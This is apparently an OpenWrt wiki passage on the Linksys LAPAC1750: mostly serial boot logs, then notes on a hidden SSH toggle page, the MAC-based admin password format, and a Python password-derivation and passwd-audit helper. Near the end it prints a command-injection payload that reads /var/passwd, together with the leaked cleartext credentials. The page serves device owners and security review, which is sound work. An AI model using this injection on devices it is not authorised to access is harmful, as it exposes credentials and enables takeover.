Setting vdev param = 1e, value = 1
OL vap_stop +
wmi_unified_vdev_stop_send
OL vap_stop -
STOPPED EVENT for vap 0
OL vap_start +
OL vap_start -
ol_vdev_start_resp_ev
ol_ath_vap_join: join operation is only for STA/IBSS mode
ol_ath_wmm_update:
Setting vdev param = 3, value = 100
Notification to UMAC VAP layer
Device ath100 port type is 0
device ath100 entered promiscuous mode
br0: port 3(ath100) entering learning state
FWLOG: [87370] WAL_DBGID_BB_WDOG_TRIGGERED ( 0x1554a, 0x200008a, 0x0, 0xc )
br0: port 3(ath100) entering forwarding state
ap_name=stp,action=start
ap_name=lanDot1xSupp,action=start
ap_name=wins,action=restart
ap_name=sshd,action=start
ap_name=mdns,action=restart
ap_name=lldpd,action=restart
ap_name=cplogo,action=start
/usr/sbin/networkIntegrality Running..........
ap_name=syslogd,action=start
ap_name=portal,action=start
ap_name=portal_vlan,action=start
ap_name=cluster,action=start
ap_name=snmp,action=start
```


```
U-Boot 1.1.4 (Jan 24 2014 - 13:18:57)
ap135 - Scorpion 1.0DRAM:
sri
Scorpion 1.0
ath_ddr_initial_config(200): (32bit) ddr2 init
tap = 0x00000003
Tap (low, high) = (0x4, 0x1e)
Tap values = (0x11, 0x11, 0x11, 0x11)
128 MB
Top of RAM usable for U-Boot at: 88000000
Reserving 344k for U-Boot at: 87fa8000
Reserving 192k for malloc() at: 87f78000
Reserving 44 Bytes for Board Info at: 87f77fd4
Reserving 36 Bytes for Global Data at: 87f77fb0
Reserving 128k for boot params() at: 87f57fb0
Stack Pointer at: 87f57f98
Now running in RAM - U-Boot at: 87fa8000
Flash Manuf Id 0xc2, DeviceId0 0x20, DeviceId1 0x18
flash size 16MB, sector count = 256
Flash: 16 MB
*** Warning *** : PCIe WLAN Module not found !!!
In: serial
Out: serial
Err: serial
Net: ath_gmac_enet_initialize...
athrs_sgmii_res_cal: cal value = 0xe
ath_gmac_enet_initialize: reset mask:c02200
Scorpion ----> S17 PHY *
athrs17_reg_init: complete
Force MAC0 as RGMII link up!
: cfg1 0x80000000 cfg2 0x7214
eth0: 58:ef:68:b2:d9:f7
eth0 up
Max resets limit reached exiting...
athr_gmac_sgmii_setup SGMII done
: cfg1 0x800c0000 cfg2 0x7214
eth1: 58:ef:68:b2:d9:f7
eth1 up
eth0, eth1
Setting 0x18116290 to 0x458ba14f
Hit any key to stop autoboot: 0
Flash Sector Number : 256.
***************************************************
Sercomm Boot Version 2.02.0
***************************************************
Get boot flag: 0xff
Begin to verify the default image... ok!
Entering Firmware : Everything is OK.
### main_loop: bootcmd="bootm 0x9f050100"
## Booting image at 9f050100 ...
Image Name: MIPS OpenWrt Linux-6.12.62
Created: 2025-12-23 16:45:24 UTC
Image Type: MIPS Linux Kernel Image (lzma compressed)
Data Size: 3323 Bytes = 3.2 kB
Load Address: 80060000
Entry Point: 80060000
Verifying Checksum at 0x9f050140 ...OK
Uncompressing Kernel Image ... OK
No initrd
## Transferring control to Linux (at address 80060000) ...
## Giving linux memsize in bytes, 134217728
Starting kernel ...
OpenWrt kernel loader for AR7XXX/AR9XXX
Copyright (C) 2011 Gabor Juhos <juhosg@openwrt.org>
Looking for OpenWrt image... found at 0xbf060000
Decompressing kernel... done!
Starting kernel at 80060000...
[ 0.000000] Linux version 6.12.62 (build@834b9a072102) (mips-openwrt-linux-musl-gcc (OpenWrt GCC 14.3.0 r32350+1-41a1874c70) 14.3.0, GNU ld (GNU Binutils) 2.44) #0 Tue Dec 23 16:45:24 2025
[ 0.000000] printk: legacy bootconsole [early0] enabled
[ 0.000000] CPU0 revision is: 00019750 (MIPS 74Kc)
[ 0.000000] MIPS: machine is Linksys LAPAC1750
[ 0.000000] SoC: Qualcomm Atheros QCA9558 ver 1 rev 0
[ 0.000000] Initrd not found or empty - disabling initrd
[ 0.000000] OF: reserved mem: Reserved memory: No reserved-memory node in the DT
[ 0.000000] Primary instruction cache 64kB, VIPT, 4-way, linesize 32 bytes.
[ 0.000000] Primary data cache 32kB, 4-way, VIPT, cache aliases, linesize 32 bytes
[ 0.000000] Zone ranges:
[ 0.000000] Normal [mem 0x0000000000000000-0x0000000007ffffff]
[ 0.000000] Movable zone start for each node
[ 0.000000] Early memory node ranges
[ 0.000000] node 0: [mem 0x0000000000000000-0x0000000007ffffff]
[ 0.000000] Initmem setup node 0 [mem 0x0000000000000000-0x0000000007ffffff]
[ 0.000000] Kernel command line: console=ttyS0,115200n8 rootfstype=squashfs,jffs2
[ 0.000000] Dentry cache hash table entries: 16384 (order: 4, 65536 bytes, linear)
[ 0.000000] Inode-cache hash table entries: 8192 (order: 3, 32768 bytes, linear)
[ 0.000000] Writing ErrCtl register=00000000
[ 0.000000] Readback ErrCtl register=00000000
[ 0.000000] Built 1 zonelists, mobility grouping on. Total pages: 32768
[ 0.000000] mem auto-init: stack:off, heap alloc:off, heap free:off
[ 0.000000] SLUB: HWalign=32, Order=0-3, MinObjects=0, CPUs=1, Nodes=1
[ 0.000000] RCU Tasks Trace: Setting shift to 0 and lim to 1 rcu_task_cb_adjust=1 rcu_task_cpu_ids=1.
[ 0.000000] NR_IRQS: 51
[ 0.000000] CPU clock: 720.000 MHz
[ 0.000000] clocksource: MIPS: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 5309056796 ns
[ 0.000001] sched_clock: 32 bits at 360MHz, resolution 2ns, wraps every 5965232126ns
[ 0.008354] Calibrating delay loop... 358.80 BogoMIPS (lpj=1794048)
[ 0.075007] pid_max: default: 32768 minimum: 301
[ 0.089834] Mount-cache hash table entries: 1024 (order: 0, 4096 bytes, linear)
[ 0.097639] Mountpoint-cache hash table entries: 1024 (order: 0, 4096 bytes, linear)
[ 0.115264] Memory: 118840K/131072K available (6747K kernel code, 599K rwdata, 1524K rodata, 1232K init, 229K bss, 11680K reserved, 0K cma-reserved)
[ 0.133093] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 19112604462750000 ns
[ 0.143610] futex hash table entries: 256 (order: 0, 3072 bytes, linear)
[ 0.157797] pinctrl core: initialized pinctrl subsystem
[ 0.166713] NET: Registered PF_NETLINK/PF_ROUTE protocol family
[ 0.187418] clocksource: Switched to clocksource MIPS
[ 0.203820] NET: Registered PF_INET protocol family
[ 0.209273] IP idents hash table entries: 2048 (order: 2, 16384 bytes, linear)
[ 0.217798] tcp_listen_portaddr_hash hash table entries: 1024 (order: 0, 4096 bytes, linear)
[ 0.226817] Table-perturb hash table entries: 65536 (order: 6, 262144 bytes, linear)
[ 0.236125] TCP established hash table entries: 1024 (order: 0, 4096 bytes, linear)
[ 0.244316] TCP bind hash table entries: 1024 (order: 1, 8192 bytes, linear)
[ 0.251861] TCP: Hash tables configured (established 1024 bind 1024)
[ 0.259291] MPTCP token hash table entries: 512 (order: 1, 6144 bytes, linear)
[ 0.267230] UDP hash table entries: 256 (order: 0, 4096 bytes, linear)
[ 0.274251] UDP-Lite hash table entries: 256 (order: 0, 4096 bytes, linear)
[ 0.282472] NET: Registered PF_UNIX/PF_LOCAL protocol family
[ 0.288582] PCI: CLS 0 bytes, default 32
[ 0.296420] workingset: timestamp_bits=14 max_order=15 bucket_order=1
[ 0.304811] squashfs: version 4.0 (2009/01/31) Phillip Lougher
[ 0.311064] jffs2: version 2.2 (NAND) (SUMMARY) (LZMA) (RTIME) (CMODE_PRIORITY) (c) 2001-2006 Red Hat, Inc.
[ 0.328251] pinctrl-single 1804002c.pinmux: 544 pins, size 68
[ 0.340660] Serial: 8250/16550 driver, 1 ports, IRQ sharing disabled
[ 0.348452] printk: legacy console [ttyS0] disabled
[ 0.354306] 18020000.uart: ttyS0 at MMIO 0x18020000 (irq = 11, base_baud = 2500000) is a 16550A
[ 0.363657] printk: legacy console [ttyS0] enabled
[ 0.363657] printk: legacy console [ttyS0] enabled
[ 0.373866] printk: legacy bootconsole [early0] disabled
[ 0.373866] printk: legacy bootconsole [early0] disabled
[ 0.395958] 5 fixed-partitions partitions found on MTD device spi0.0
[ 0.402471] Creating 5 MTD partitions on "spi0.0":
[ 0.407336] 0x000000000000-0x000000040000 : "u-boot"
[ 0.414865] 0x000000040000-0x000000050000 : "u-boot-env"
[ 0.421810] 0x000000050000-0x0000007f0000 : "fwconcat0"
[ 0.428499] 0x0000007f0000-0x000000800000 : "art"
[ 0.434948] 0x000000800000-0x000000f00000 : "fwconcat1"
[ 0.837924] ag71xx-legacy 19000000.eth: connected to PHY at mdio.0:00 [uid=004dd072, driver=Qualcomm Atheros AR8035]
[ 0.849298] eth0: Atheros AG71xx at 0xb9000000, irq 4, mode: rgmii-id
[ 0.856255] i2c_dev: i2c /dev entries driver
[ 0.862732] NET: Registered PF_INET6 protocol family
[ 0.872929] Segment Routing with IPv6
[ 0.876747] In-situ OAM (IOAM) with IPv6
[ 0.880911] NET: Registered PF_PACKET protocol family
[ 0.886088] 8021q: 802.1Q VLAN Support v1.8
[ 0.907878] PCI host bridge to bus 0000:00
[ 0.912054] pci_bus 0000:00: root bus resource [mem 0x10000000-0x11ffffff]
[ 0.919080] pci_bus 0000:00: root bus resource [io 0x0000]
[ 0.924739] pci_bus 0000:00: No busn resource found for root bus, will use [bus 00-ff]
[ 0.932857] pci 0000:00:00.0: [168c:003c] type 00 class 0x028000 PCIe Endpoint
[ 0.940251] pci 0000:00:00.0: BAR 0 [mem 0x00000000-0x001fffff 64bit]
[ 0.946838] pci 0000:00:00.0: ROM [mem 0x00000000-0x0000ffff pref]
[ 0.953210] pci 0000:00:00.0:
```
supports D1 D2 [ 0.958707] pci_bus 0000:00: busn_res: [bus 00-ff] end is updated to 00 [ 0.965454] pci 0000:00:00.0: BAR 0 [mem 0x10000000-0x101fffff 64bit]: assigned [ 0.972932] pci 0000:00:00.0: ROM [mem 0x10200000-0x1020ffff pref]: assigned [ 0.980548] Concatenating MTD devices: [ 0.984368] (0): "fwconcat0" [ 0.987295] (1): "fwconcat1" [ 0.990265] into device "virtual_flash" [ 0.994192] 2 fixed-partitions partitions found on MTD device virtual_flash [ 1.001540] Creating 2 MTD partitions on "virtual_flash": [ 1.007032] 0x000000000000-0x000000ea0000 : "firmware" [ 1.020645] 0x000000010000-0x000000ea0000 : "uimage" [ 1.027163] 2 uimage-fw partitions found on MTD device uimage [ 1.033060] Creating 2 MTD partitions on "uimage": [ 1.037939] 0x000000000000-0x0000002b0000 : "kernel" [ 1.044159] 0x0000002b0000-0x000000e90000 : "rootfs" [ 1.050488] mtd: setting mtd8 (rootfs) as root device [ 1.055689] 1 squashfs-split partitions found on MTD device rootfs [ 1.062013] 0x000000690000-0x000000e90000 : "rootfs_data" [ 1.073695] clk: Disabling unused clocks [ 1.085053] VFS: Mounted root (squashfs filesystem) readonly on device 31:8. [ 1.096448] Freeing unused kernel image (initmem) memory: 1232K [ 1.102500] This architecture does not have kernel memory protection. [ 1.109056] Run /sbin/init as init process [ 1.766159] init: Console is alive [ 1.770047] init: - watchdog - [ 3.063764] kmodloader: loading kernel modules from /etc/modules-boot.d/* [ 3.146534] gpio_button_hotplug: loading out-of-tree module taints kernel. 
[ 3.156705] kmodloader: done loading kernel modules from /etc/modules-boot.d/* [ 3.174584] init: - preinit - [ 7.047452] random: crng init done Press the [f] key and hit [enter] to enter failsafe mode Press the [1], [2], [3] or [4] key and hit [enter] to select the debug level [ 10.909210] eth0: link up (1000Mbps/Full duplex) [ 12.101711] jffs2: notice: (472) jffs2_build_xattr_subsystem: complete building xattr subsystem, 32 of xdatum (28 unchecked, 4 orphan) and 39 of xref (4 dead, 0 orphan) found. [ 12.120512] mount_root: switching to jffs2 overlay [ 12.128900] overlayfs: upper fs does not support tmpfile. [ 12.141311] urandom-seed: Seeding with /etc/urandom.seed [ 12.264110] eth0: link down [ 12.282003] procd: - early - [ 12.285228] procd: - watchdog - [ 12.916217] procd: - watchdog - [ 12.920685] procd: - ubus - [ 13.060916] procd: - init - Please press Enter to activate this console. [ 14.505994] kmodloader: loading kernel modules from /etc/modules.d/* [ 15.905715] Loading modules backported from Linux version v6.18-0-g7d0a66e4b [ 15.912922] Backport generated by backports.git 4d44cef [ 16.666282] urngd: v1.0.2 started. [ 16.753848] PPP generic driver version 2.4.2 [ 16.778507] NET: Registered PF_PPPOX protocol family [ 16.871053] ath10k 6.15 driver, optimized for CT firmware, probing pci device: 0x3c. 
[ 16.918131] ath10k_pci 0000:00:00.0: enabling device (0000 -> 0002) [ 16.924667] ath10k_pci 0000:00:00.0: pci irq legacy oper_irq_mode 1 irq_mode 0 reset_mode 0 [ 20.952379] ath10k_pci 0000:00:00.0: qca988x hw2.0 target 0x4100016c chip_id 0x043202ff sub 0000:0000 [ 20.961818] ath10k_pci 0000:00:00.0: kconfig debug 0 debugfs 1 tracing 0 dfs 1 testmode 0 [ 20.972166] ath10k_pci 0000:00:00.0: firmware ver 10.1-ct-8x-__fW-023-23ea9f8e api 2 features wmi-10.x,has-wmi-mgmt-tx,mfp,peer-fixed-rate,txstatus-noack,wmi-10.x-CT,ratemask-CT,txrate-CT,get-temp-CT,tx-rc-CT,cust-stats-CT,retry-gt2-CT,txrate2-CT,beacon-cb-CT,wmi-block-ack-CT crc32 42c82ae5 [ 21.684219] ath10k_pci 0000:00:00.0: board_file api 1 bmi_id N/A crc32 bebc7c08 [ 22.660198] ath10k_pci 0000:00:00.0: 10.1 wmi init: vdevs: 16 peers: 127 tid: 256 [ 22.676353] ath10k_pci 0000:00:00.0: wmi print 'P 128 V 8 T 410' [ 22.682725] ath10k_pci 0000:00:00.0: wmi print 'msdu-desc: 1424 sw-crypt: 0 ct-sta: 0' [ 22.690894] ath10k_pci 0000:00:00.0: wmi print 'alloc rem: 23808 iram: 38144' [ 22.736706] ath10k_pci 0000:00:00.0: htt-ver 2.1 wmi-op 2 htt-op 2 cal nvmem max-sta 128 raw 0 hwcrypto 1 [ 22.754408] ath10k_pci 0000:00:00.0: NOTE: Firmware DBGLOG output disabled in debug_mask: 0x10000000 [ 22.960754] ieee80211 phy1: Atheros AR9550 Rev:0 mem=0xbdc2431a, irq=13 [ 22.997847] kmodloader: done loading kernel modules from /etc/modules.d/* [ 37.967829] br-lan: port 1(eth0) entered blocking state [ 37.973184] br-lan: port 1(eth0) entered disabled state [ 37.978580] ag71xx-legacy 19000000.eth eth0: entered allmulticast mode [ 37.985466] ag71xx-legacy 19000000.eth eth0: entered promiscuous mode [ 40.029268] eth0: link up (1000Mbps/Full duplex) [ 40.034032] br-lan: port 1(eth0) entered blocking state [ 40.039390] br-lan: port 1(eth0) entered forwarding state [ 44.108259] ath10k_pci 0000:00:00.0: 10.1 wmi init: vdevs: 16 peers: 127 tid: 256 [ 44.124386] ath10k_pci 0000:00:00.0: wmi print 'P 128 V 8 T 410' [ 44.130754] ath10k_pci 
0000:00:00.0: wmi print 'msdu-desc: 1424 sw-crypt: 0 ct-sta: 0' [ 44.138934] ath10k_pci 0000:00:00.0: wmi print 'alloc rem: 23808 iram: 38144' [ 44.186484] ath10k_pci 0000:00:00.0: pdev param 0 not supported by firmware [ 44.214183] ath10k_pci 0000:00:00.0: rts threshold -1 [ 44.244244] br-lan: port 2(phy0-ap0) entered blocking state [ 44.249972] br-lan: port 2(phy0-ap0) entered disabled state [ 44.255675] ath10k_pci 0000:00:00.0 phy0-ap0: entered allmulticast mode [ 44.262722] ath10k_pci 0000:00:00.0 phy0-ap0: entered promiscuous mode [ 48.367751] br-lan: port 3(phy1-ap0) entered blocking state [ 48.373434] br-lan: port 3(phy1-ap0) entered disabled state [ 48.379179] ath9k 18100000.wmac phy1-ap0: entered allmulticast mode [ 48.385847] ath9k 18100000.wmac phy1-ap0: entered promiscuous mode [ 58.184286] br-lan: port 3(phy1-ap0) entered blocking state [ 58.190004] br-lan: port 3(phy1-ap0) entered forwarding state [ 59.769009] br-lan: port 2(phy0-ap0) entered blocking state [ 59.774717] br-lan: port 2(phy0-ap0) entered forwarding state


There is a hidden page that allows SSH to be toggled on. After logging in, navigate directly to /ssh.htm, toggle SSH on and save the change. The SSH server is started immediately. As the server is an old version of OpenSSH, it uses the deprecated ssh-rsa host key algorithm, which is disabled by default on current OpenSSH versions. This is indicated by the following error message when you try to connect:

Unable to negotiate with <host> port 22: no matching host key type found.
Their offer: ssh-rsa,ssh-dss

Enable the obsolete algorithm to allow a connection anyway:

ssh -oHostkeyAlgorithms=+ssh-rsa admin@<host>

The password for the admin user is generated based on the password set in the web interface and the primary MAC address of the device. The format is as follows:

AABBCCpasswordDDEEFF

Where AABBCC are the first and DDEEFF are the last three octets of the MAC address with uppercase letters and without any delimiter. So for the MAC address 58:ef:68:01:23:ab and password `admin` the full password would be 58EF68admin0123AB.

The password can be read in plain text from /var/passwd by injecting the command as detailed above:

' || S=${PWD%u*} && ${S}bin${S}cat ${S}var${S}passwd #

The output would then look similar to this:

...
root::0:0:root:/:/bin/sh
nobody::99:99:Nobody:/:/sbin/sh
sshd::99:99:Nobody:/:/sbin/sh
admin:58EF68admin0123AB:0:0:root:/:/bin/sh
...
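
The following Python example is an addition to this page, not code from Linksys or OpenWrt. It builds the SSH password from the documented AABBCCpasswordDDEEFF format and audits a passwd-style capture for empty, unhashed and UID 0 entries; the function names and the sample text are constructed for illustration.

```python
import re

# Constructed sample in the shape of the /var/passwd output shown above.
SAMPLE = """...
root::0:0:root:/:/bin/sh
nobody::99:99:Nobody:/:/sbin/sh
sshd::99:99:Nobody:/:/sbin/sh
admin:58EF68admin0123AB:0:0:root:/:/bin/sh
..."""

# crypt(3) shapes: "$id$..." or 13-character DES. A 13-character cleartext
# value from the same alphabet is indistinguishable and would be missed.
HASHED = re.compile(r"\$[0-9a-z]+\$.+|[./0-9A-Za-z]{13}")
LOCKED = {"x", "*", "!", "!!"}
DERIVED = re.compile(r"([0-9A-F]{6})(.*)([0-9A-F]{6})", re.S)


def derive_ssh_password(mac, web_password):
    """Build AABBCCpasswordDDEEFF from a MAC written in any common notation."""
    digits = re.sub(r"[:.\-]", "", mac.strip()).upper()
    if not re.fullmatch(r"[0-9A-F]{12}", digits):
        raise ValueError(f"not a 48-bit MAC address: {mac!r}")
    return digits[:6] + web_password + digits[6:]


def audit_passwd(text):
    """Return (user, finding) pairs for a passwd-format capture."""
    findings = []
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) < 7:
            continue  # "..." markers and truncated lines
        # The last five fields are fixed; a cleartext password may contain ":".
        user, password, uid = parts[0], ":".join(parts[1:-5]), parts[-5]
        if uid == "0" and user != "root":
            findings.append((user, "uid 0 (root-equivalent)"))
        if password == "":
            findings.append((user, "empty password field"))
        elif password not in LOCKED and not HASHED.fullmatch(password):
            findings.append((user, "password not hashed"))
            m = DERIVED.fullmatch(password)
            if m:  # matches the documented MAC + web password layout
                findings.append((user, f"reveals MAC {m[1]}{m[3]} and web password {m[2]!r}"))
    return findings


if __name__ == "__main__":
    for user, finding in audit_passwd(SAMPLE):
        print(f"{user}: {finding}")
```

Because the stored value is the cleartext concatenation, anyone who can read the file recovers both the web interface password and the device MAC address, so the web password should be treated as exposed once this file has been read.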
  • Last modified: 2026/03/24 23:24
  • by mmlr